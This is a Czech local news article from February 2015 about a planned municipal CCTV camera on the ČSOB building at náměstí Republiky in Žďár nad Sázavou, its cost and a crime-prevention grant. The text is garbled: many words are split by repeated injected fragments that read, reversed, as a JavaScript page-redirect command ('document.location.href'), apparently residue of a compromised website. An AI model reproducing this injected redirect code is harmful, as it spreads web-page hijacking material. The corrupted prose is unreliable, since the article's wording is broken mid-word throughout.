Rainbow page separator

Na náměstí Republiky přibude další kamerový bod

Čtvrtek, 26. února 2015

Náměstí Republiky Žďár nad Sázavou - ČSOB

Žďár nad Sázavou / Nový kamerový bod v le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tošním roce přibude ve Žďáře nad Sázavou. Ten[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tokrát se má jednat o „oko“ městského kamerového systému umístěné na budově ČSOB na náměstí Republiky, které dohlédne rovněž na pros[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tor u průchodu do atria, zejména kolem non-s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];top pivnice a vedlejšího okénka s občerstvením. Právě tam se v nočních hodinách pohybuje množství lidí posilněných alkoholem a zejména strážníci jsou do lokality čas[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to voláni k řešení výtržností.
Kamera, která má přibýt na své mís[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na podzim, dohlédne i na novou kašnu na náměstí. Kamerový bod vyjde zhruba na dvě stě tisíc korun a žďárská radnice hodlá v té[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to souvislosti požádat o krajskou dotaci z programu prevence kriminality, která by mohla pokrýt devadesát procent potřebných nákladů.